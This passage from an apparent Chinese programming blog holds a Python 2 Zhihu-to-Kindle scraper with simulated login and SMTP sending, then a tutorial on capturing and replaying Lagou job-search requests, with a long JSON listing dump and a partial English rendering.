        # send_kindle.send_txt(filename)
        # 调用发送邮件函数,把电子书发送到你的kindle用户的邮箱账号,这样你的kindle就可以收到电子书啦
        print filename


class MailAtt():
    def __init__(self, smtp_server, from_mail, password, to_mail):
        self.server = smtp_server
        self.username = from_mail.split("@")[0]
        self.from_mail = from_mail
        self.password = password
        self.to_mail = to_mail
        # 初始化邮箱设置

    def send_txt(self, filename):
        # 这里发送附件尤其要注意字符编码,当时调试了挺久的,因为收到的文件总是乱码
        self.smtp = smtplib.SMTP()
        self.smtp.connect(self.server)
        self.smtp.login(self.username, self.password)
        self.msg = MIMEMultipart()
        self.msg['to'] = self.to_mail
        self.msg['from'] = self.from_mail
        self.msg['Subject'] = "Convert"
        self.filename = filename + ".txt"
        self.msg['Date'] = Utils.formatdate(localtime=1)
        content = open(self.filename.decode('utf-8'), 'rb').read()
        # print content
        self.att = MIMEText(content, 'base64', 'utf-8')
        self.att['Content-Type'] = 'application/octet-stream'
        # self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % (self.filename.encode('gb2312'))
        self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')
        # print self.att["Content-Disposition"]
        self.msg.attach(self.att)

        self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())
        self.smtp.quit()


if __name__ == "__main__":

    sub_folder = os.path.join(os.getcwd(), "content")
    # 专门用于存放下载的电子书的目录
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)

    id = sys.argv[1]
    # 给出的第一个参数 就是你要下载的问题的id
    # 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
    # 那么 就输入 python zhihu.py 29372574

    # id_link = "/question/" + id
    obj = GetContent(id)
    # obj.getAnswer(id_link)
    # 调用获取函数

    print "Done"





 
#######################################
2016.8.19 更新
添加了新功能,模拟知乎登陆,自动获取自己关注的答案,制作成电子书并且发送到kindle





# -*-coding=utf-8-*-
__author__ = 'Rocky'
import requests
import cookielib
import re
import json
import time
import os
from getContent import GetContent

agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers = {'Host': 'www.zhihu.com',
           'Referer': 'https://www.zhihu.com',
           'User-Agent': agent}

# 全局变量
session = requests.session()

session.cookies = cookielib.LWPCookieJar(filename="cookies")

try:
    session.cookies.load(ignore_discard=True)
except:
    print "Cookie can't load"


def isLogin():
    url = 'https://www.zhihu.com/settings/profile'
    login_code = session.get(url, headers=headers, allow_redirects=False).status_code
    print login_code
    if login_code == 200:
        return True
    else:
        return False


def get_xsrf():
    url = 'http://www.zhihu.com'
    r = session.get(url, headers=headers, allow_redirects=False)
    txt = r.text
    result = re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>', txt)[0]
    return result


def getCaptcha():
    # r=1471341285051
    r = (time.time() * 1000)
    url = 'http://www.zhihu.com/captcha.gif?r=' + str(r) + '&type=login'
    image = session.get(url, headers=headers)
    f = open("photo.jpg", 'wb')
    f.write(image.content)
    f.close()


def Login():
    xsrf = get_xsrf()
    print xsrf
    print len(xsrf)
    login_url = 'http://www.zhihu.com/login/email'
    data = {
        '_xsrf': xsrf,
        'password': '*',
        'remember_me': 'true',
        'email': '*'
    }
    try:
        content = session.post(login_url, data=data, headers=headers)
        login_code = content.text
        print content.status_code
        # this line important ! if no status, if will fail and execute the except part
        # print content.status

        if content.status_code != requests.codes.ok:
            print "Need to verification code !"
            getCaptcha()
            # print "Please input the code of the captcha"
            code = raw_input("Please input the code of the captcha")
            data['captcha'] = code
            content = session.post(login_url, data=data, headers=headers)
            print content.status_code

            if content.status_code == requests.codes.ok:
                print "Login successful"
                session.cookies.save()
                # print login_code
        else:
            session.cookies.save()
    except:
        print "Error in login"
        return False


def focus_question():
    focus_id = []
    url = 'https://www.zhihu.com/question/following'
    content = session.get(url, headers=headers)
    print content
    p = re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')
    id_list = p.findall(content.text)
    pattern = re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')
    result = re.findall(pattern, content.text)[0]
    print result
    for i in id_list:
        print i
        focus_id.append(i)

    url_next = 'https://www.zhihu.com/node/ProfileFollowedQuestionsV2'
    page = 20
    offset = 20
    end_page = 500
    xsrf = re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"', content.text)[0]
    while offset < end_page:
        # para='{"offset":20}'
        # print para
        print "page: %d" % offset
        params = {"offset": offset}
        params_json = json.dumps(params)

        data = {
            'method': 'next',
            'params': params_json,
            '_xsrf': xsrf
        }
        # 注意上面那里 post的data需要一个xsrf的字段,不然会返回403 的错误,这个在抓包的过程中一直都没有看到提交的xsrf,所以自己摸索出来的
        offset = offset + page
        headers_l = {
            'Host': 'www.zhihu.com',
            'Referer': 'https://www.zhihu.com/question/following',
            'User-Agent': agent,
            'Origin': 'https://www.zhihu.com',
            'X-Requested-With': 'XMLHttpRequest'
        }
        try:
            s = session.post(url_next, data=data, headers=headers_l)
            # print s.status_code
            # print s.text
            msgs = json.loads(s.text)
            msg = msgs['msg']
            for i in msg:
                id_sub = re.findall(p, i)
                for j in id_sub:
                    print j
                    id_list.append(j)
        except:
            print "Getting Error "

    return id_list


def main():
    if isLogin():
        print "Has login"
    else:
        print "Need to login"
        Login()
    list_id = focus_question()
    for i in list_id:
        print i
        obj = GetContent(i)


# getCaptcha()
if __name__ == '__main__':
    sub_folder = os.path.join(os.getcwd(), "content")
    # 专门用于存放下载的电子书的目录
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)

    main()
 
 完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle
 

Firefox抓包分析 (拉勾网抓包分析)

低调的哥哥 发表了文章 • 15 个评论 • 11390 次浏览 • 2016-05-09 18:30 • 来自相关话题

针对一些JS动态网页,在源码中无法直接看到它的内容,可以通过抓包分析出其JSON格式的数据。网页通过这些JSON数据对内容进行填充,渲染之后就能看到相关的内容了。
 
我用过chrome、firefox、wireshark来抓包,比较方便的是chrome,不需要安装第三方的其它插件,不过打开新页面的时候又要重新开一个捕捉页面,会错过一些实时的数据。 
 
wireshark需要专门掌握它自己的过滤规则,学习成本摆在那里。 
 
最好用的还是firefox+firebug第三方插件。
 
接下来以拉勾网为例。
 
打开firebug功能
 
www.lagou.com 在左侧栏随便点击一个岗位,以android为例 
 





 
在firebug中,需要点击“网络”选项卡,然后选择XHR。
 





 
Post的信息就是我们需要关注的,点击post的链接
 





 
点击了Android之后,我们从浏览器上传了几个参数到拉勾的服务器:
一个是 first=true,一个是 kd=android(关键字),一个是 pn=1(page number,页码)。
 
所以我们就可以模仿这一个步骤,构造一个数据包来模拟用户的点击动作:

post_data = {'first': 'true', 'kd': 'Android', 'pn': '1'}

然后使用python中最简单的requests库来提交数据,而这些数据正是抓包里看到的数据。

import requests

url = "http://www.lagou.com/jobs/posi ... ot%3B
return_data = requests.post(url, data=post_data)
print return_data.text

呐,打印出来的数据就是返回来的json数据{"code":0,"success":true,"requestId":null,"resubmitToken":null,"msg":null,"content":{"pageNo":1,"pageSize":15,"positionResult":{"totalCount":5000,"pageSize":15,"locationInfo":{"city":null,"district":null,"businessZone":null},"result":[{"createTime":"2016-05-05 17:27:50","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1455217,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术极客云集","industryField":"移动互联网 · 企业服务","score":1372,"district":"西城区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":13,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462440470000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":6627,"pvScore":73.2258060280967,"plus":"是","businessZones":["新街口","德胜门","小西天"],"publisherId":994817,"loginTime":1462876049000,"appShow":3141,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-05 18:30:16","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1440576,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术爆棚!","industryField":"移动互联网 · 企业服务","score":1372,"district":"海淀区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":6,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462444216000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":3214,"pvScore":73.37271526202157,"plus":"是","businessZones":["双榆树","中关村","大钟寺"],"publisherId":994817,"loginTime":1462876049000,"appShow":1782,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 18:41:29","companyId":94307,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"宁波海大物联科技有限公司","city":"宁波","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1070249,"companyLogo":"image2/M00/03/32/CgqLKVXtWiuAUbXgAAB1g_5FW3Y484.png?cc=0.6152940313331783","positionFirstType":"技术","companyName":"海大物联","positionAdvantage":"一流的技术团队,丰厚的薪资回报。","industryField":"移动互联网 · 企业服务","score":1353,"district":"鄞州区","companyLabelList":["节日礼物","年底双薪","带薪年假","年度旅游"],"deliverCount":0,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462876889000,"positonTypesMap":null,"hrScore":75,"flowScore":167,"showCount":1031,"pvScore":47.6349840620252,"plus":"是","businessZones":null,"publisherId":2494230,"loginTime":1462885305000,"appShow":184,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"18:41发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 
17:57:43","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1387825,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业项目。优质福利待遇+期权","industryField":"移动互联网 · 医疗健康","score":1344,"district":"江干区","companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":5,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874263000,"positonTypesMap":null,"hrScore":74,"flowScore":153,"showCount":1312,"pvScore":66.87818057124453,"plus":"是","businessZones":["四季青","景芳"],"publisherId":3655492,"loginTime":1462873104000,"appShow":573,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:49:47","companyId":15071,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州短趣网络传媒技术有限公司","city":"杭州","salary":"10k-20k","financeStage":"成长型(A轮)","positionId":1803257,"companyLogo":"image2/M00/0B/80/CgpzWlYYse2AJgc0AABG9iSEWAE052.jpg","positionFirstType":"技术","companyName":"短趣网","positionAdvantage":"高额项目奖金,行业内有竞争力的薪资水平","industryField":"移动互联网 · 社交网络","score":1343,"district":null,"companyLabelList":["绩效奖金","年终分红","五险一金","通讯津贴"],"deliverCount":1,"leaderName":"王强宇","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":28,"imstate":"today","createTimeSort":1462859387000,"positonTypesMap":null,"hrScore":68,"flowScore":178,"showCount":652,"pvScore":32.82081357576065,"plus":"否","businessZones":null,"publisherId":4362468,"loginTime":1462870318000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"13:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:55:08","companyId":28422,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"成都品果科技有限公司","city":"北京","salary":"18k-30k","financeStage":"成长型(B轮)","positionId":290875,"companyLogo":"i/image/M00/02/F3/Cgp3O1ah7FuAbSnkAACMlcPiWXk393.png","positionFirstType":"技术","companyName":"camera360","positionAdvantage":"高大上的福利待遇、发展前景等着你哦!","industryField":"移动互联网","score":1339,"district":"海淀区","companyLabelList":["年终分红","绩效奖金","年底双薪","五险一金"],"deliverCount":6,"leaderName":"徐灏","companySize":"15-50人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462859708000,"positonTypesMap":null,"hrScore":80,"flowScore":188,"showCount":1199,"pvScore":19.745453118211834,"plus":"是","businessZones":["中关村","北京大学","苏州街"],"publisherId":389753,"loginTime":1462866640000,"appShow":0,"calcScore":false,"showOrder":1433137697136,"haveDeliver":false,"orderBy":71,"adWord":0,"formatCreateTime":"13:55发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:55","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"不限","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1410975,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业团队","industryField":"移动互联网 
· 医疗健康","score":1335,"district":null,"companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":9,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874275000,"positonTypesMap":null,"hrScore":74,"flowScore":144,"showCount":2085,"pvScore":77.9570832081189,"plus":"是","businessZones":null,"publisherId":3655492,"loginTime":1462873104000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-09 09:46:32","companyId":113895,"positionName":"Android开发工程师","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"北京互动金服科技有限公司","city":"北京","salary":"15k-25k","financeStage":"成长型(不需要融资)","positionId":1473342,"companyLogo":"i/image/M00/03/D8/CgqKkVbEA_uAe1k4AAHTfy3RxPY812.jpg","positionFirstType":"技术","companyName":"互动科技","positionAdvantage":"五险一金 补充医疗 年终奖 福利津贴","industryField":"移动互联网 · O2O","score":1326,"district":"海淀区","companyLabelList":,"deliverCount":32,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462758392000,"positonTypesMap":null,"hrScore":82,"flowScore":153,"showCount":3741,"pvScore":67.01698353391613,"plus":"是","businessZones":["白石桥","魏公村","万寿寺","白石桥","魏公村","万寿寺"],"publisherId":3814477,"loginTime":1462874842000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"1天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 16:50:51","companyId":23999,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京智鹤电子科技有限公司","city":"长沙","salary":"8k-12k","financeStage":"成长型(A轮)","positionId":1804917,"companyLogo":"image1/M00/35/EB/CgYXBlWc5KGAVeL8AAAOi4lPhWU502.jpg","positionFirstType":"技术","companyName":"智鹤科技","positionAdvantage":"弹性工作制 技术氛围浓厚","industryField":"移动互联网","score":1322,"district":null,"companyLabelList":["股票期权","绩效奖金","专项奖金","年终分红"],"deliverCount":1,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462870251000,"positonTypesMap":null,"hrScore":62,"flowScore":191,"showCount":283,"pvScore":15.939035855045429,"plus":"否","businessZones":null,"publisherId":282621,"loginTime":1462869967000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"16:50发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-08 23:12:56","companyId":24287,"positionName":"android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州腾展科技有限公司","city":"杭州","salary":"15k-22k","financeStage":"成熟型(D轮及以上)","positionId":1197868,"companyLogo":"image1/M00/0B/7D/Cgo8PFTzIBOAEd2dAACMq9tQoMA797.png","positionFirstType":"技术","companyName":"腾展叮咚(Dingtone)","positionAdvantage":"每半年调整薪资,今年上市!","industryField":"移动互联网 · 社交网络","score":1322,"district":"西湖区","companyLabelList":["出国旅游","股票期权","精英团队","强悍的创始人"],"deliverCount":9,"leaderName":"魏松祥(Steve 
Wei)","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462720376000,"positonTypesMap":null,"hrScore":71,"flowScore":137,"showCount":3786,"pvScore":87.51582865460942,"plus":"是","businessZones":["文三路","古荡","高新文教区"],"publisherId":2946659,"loginTime":1462891920000,"appShow":940,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"2天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:38:43","companyId":19875,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"维沃移动通信有限公司","city":"南京","salary":"12k-24k","financeStage":"初创型(未融资)","positionId":938099,"companyLogo":"image1/M00/00/25/Cgo8PFTUWH-Ab57wAABKOdLbNuw116.png","positionFirstType":"技术","companyName":"vivo","positionAdvantage":"vivo,追求极致","industryField":"移动互联网","score":1320,"district":"建邺区","companyLabelList":["年终分红","五险一金","带薪年假","年度旅游"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462844323000,"positonTypesMap":null,"hrScore":57,"flowScore":149,"showCount":981,"pvScore":72.14107985481958,"plus":"是","businessZones":["沙洲","小行","赛虹桥"],"publisherId":302876,"loginTime":1462871424000,"appShow":353,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"09:38发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:49:59","companyId":20473,"positionName":"安卓开发工程师","positionType":"移动开发","workYear":"3-5年","education":"大专","jobNature":"全职","companyShortName":"广州棒谷网络科技有限公司","city":"广州","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1733545,"companyLogo":"image1/M00/0F/36/Cgo8PFT9AgGAciySAAA1THfEIAE433.jpg","positionFirstType":"技术","companyName":"广州棒谷网络科技有限公司","positionAdvantage":"五险一金 大平台 带薪休假","industryField":"电子商务","score":1320,"district":null,"companyLabelList":["项目奖金","绩效奖金","年终奖","五险一金"],"deliverCount":15,"leaderName":"大邹","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462844999000,"positonTypesMap":null,"hrScore":79,"flowScore":144,"showCount":3943,"pvScore":77.78928844199473,"plus":"是","businessZones":null,"publisherId":235413,"loginTime":1462878251000,"appShow":1562,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"09:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-04 11:41:59","companyId":87117,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京信通科技有限责任公司","city":"南京","salary":"10k-12k","financeStage":"成长型(不需要融资)","positionId":966059,"companyLogo":"image1/M00/3F/51/CgYXBlXASfuADyOsAAA_na14zho635.jpg?cc=0.6724986131303012","positionFirstType":"技术","companyName":"联创集团信通科技","positionAdvantage":"提供完善的福利和薪酬晋升制度","industryField":"移动互联网 · 
教育","score":1320,"district":"鼓楼区","companyLabelList":["节日礼物","带薪年假","补充医保","补充子女医保"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462333319000,"positonTypesMap":null,"hrScore":88,"flowScore":143,"showCount":3161,"pvScore":79.41660570401937,"plus":"是","businessZones":["虎踞路","龙江","西桥"],"publisherId":2230973,"loginTime":1462871511000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":41,"adWord":0,"formatCreateTime":"2016-05-04","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:26:58","companyId":103051,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"浙江米果网络股份有限公司","city":"杭州","salary":"12k-22k","financeStage":"成长型(A轮)","positionId":1233873,"companyLogo":"image2/M00/10/DF/CgqLKVYwKQSAR2p4AAJAM590SJM137.png?cc=0.17502541467547417","positionFirstType":"技术","companyName":"米果小站","positionAdvantage":"充分的发展成长空间","industryField":"移动互联网","score":1320,"district":"滨江区","companyLabelList":["年底双薪","股票期权","午餐补助","五险一金"],"deliverCount":5,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462843618000,"positonTypesMap":null,"hrScore":72,"flowScore":137,"showCount":1582,"pvScore":87.93158026917071,"plus":"是","businessZones":["江南","长河","西兴"],"publisherId":2992735,"loginTime":1462889479000,"appShow":312,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"09:26发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 10:01:39","companyId":70044,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"武汉平行世界网络科技有限公司","city":"武汉","salary":"9k-13k","financeStage":"初创型(天使轮)","positionId":664813,"companyLogo":"image2/M00/00/3E/CgqLKVXdccSAQE91AACv-6V33Vo860.jpg","positionFirstType":"技术","companyName":"平行世界","positionAdvantage":"弹性工作、带薪年假、待遇优厚、3号线直达","industryField":"电子商务 · 文化娱乐","score":1320,"district":"蔡甸区","companyLabelList":["年底双薪","待遇优厚","专项奖金","带薪年假"],"deliverCount":18,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462845699000,"positonTypesMap":null,"hrScore":76,"flowScore":128,"showCount":1934,"pvScore":99.6001810598155,"plus":"是","businessZones":["沌口"],"publisherId":1694134,"loginTime":1462892151000,"appShow":759,"calcScore":false,"showOrder":1433141412915,"haveDeliver":false,"orderBy":68,"adWord":0,"formatCreateTime":"10:01发布","totalCount":0,"searchScore":0.0}]}}}












在XHR中点击JSON,就可以看到浏览器返回来的数据了。 是不是跟上面使用python程序抓取的一样呢?
 





 
是不是很简单?
 
如果想获得第2页,第3页的数据呢?
 
只需要修改pn=x 中的值就可以了。post_data = {'first':'true','kd':'Android','pn':'2'} #获取第2页的内容
如果想要获取全部内容,写一个循环语句就可以了。
 
版权所有,转载请说明出处:www.30daydo.com
  查看全部
For some JavaScript-driven, dynamic web pages, the content cannot be seen in the page source. Instead, you can capture the network traffic and pick out the JSON data: the page populates its content from that JSON, which is what you end up seeing rendered in the browser.
 
I have captured traffic with Chrome, Firefox, and Wireshark. Chrome is the most convenient, since it needs no extra third-party plugins, but every time you open a new page you have to start a new capture panel, so some real-time data gets missed.
 
Wireshark requires you to master its own filter rules, so the learning cost is real.
 
The most convenient option is still Firefox with the third-party Firebug plugin.
 
Let's take Lagou (拉勾网) as an example.
 
Open the Firebug panel.
 
Open www.lagou.com and click any position in the left sidebar; we will use Android as the example.
 

[Screenshot: Android招聘-招聘求职信息-拉勾网.png]

 
In Firebug, click the "Network" tab, then select XHR.
 

[Screenshot: post.jpg]

 
The POST requests are the ones we care about; click the POST link.
 

[Screenshot: post_data.jpg]

 
After clicking Android, the browser uploads several parameters to Lagou's server: first=true, kd=android (the search keyword), and pn=1 (the page number).
 
So we can imitate this step and construct a payload that simulates the user's click:
post_data = {'first':'true','kd':'Android','pn':'1'}

Then submit the data with requests, the simplest of Python's HTTP libraries. What we post is exactly the data we saw in the capture.
import requests

url = "http://www.lagou.com/jobs/posi..."  # the full URL is truncated in the original post
return_data = requests.post(url, data=post_data)
print(return_data.text)


There it is: the printed output is the JSON data that came back.
{"code":0,"success":true,"requestId":null,"resubmitToken":null,"msg":null,"content":{"pageNo":1,"pageSize":15,"positionResult":{"totalCount":5000,"pageSize":15,"locationInfo":{"city":null,"district":null,"businessZone":null},"result":[{"createTime":"2016-05-05 17:27:50","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1455217,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术极客云集","industryField":"移动互联网 · 企业服务","score":1372,"district":"西城区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":13,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462440470000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":6627,"pvScore":73.2258060280967,"plus":"是","businessZones":["新街口","德胜门","小西天"],"publisherId":994817,"loginTime":1462876049000,"appShow":3141,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-05 18:30:16","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1440576,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术爆棚!","industryField":"移动互联网 · 企业服务","score":1372,"district":"海淀区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":6,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462444216000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":3214,"pvScore":73.37271526202157,"plus":"是","businessZones":["双榆树","中关村","大钟寺"],"publisherId":994817,"loginTime":1462876049000,"appShow":1782,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 18:41:29","companyId":94307,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"宁波海大物联科技有限公司","city":"宁波","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1070249,"companyLogo":"image2/M00/03/32/CgqLKVXtWiuAUbXgAAB1g_5FW3Y484.png?cc=0.6152940313331783","positionFirstType":"技术","companyName":"海大物联","positionAdvantage":"一流的技术团队,丰厚的薪资回报。","industryField":"移动互联网 · 企业服务","score":1353,"district":"鄞州区","companyLabelList":["节日礼物","年底双薪","带薪年假","年度旅游"],"deliverCount":0,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462876889000,"positonTypesMap":null,"hrScore":75,"flowScore":167,"showCount":1031,"pvScore":47.6349840620252,"plus":"是","businessZones":null,"publisherId":2494230,"loginTime":1462885305000,"appShow":184,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"18:41发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 
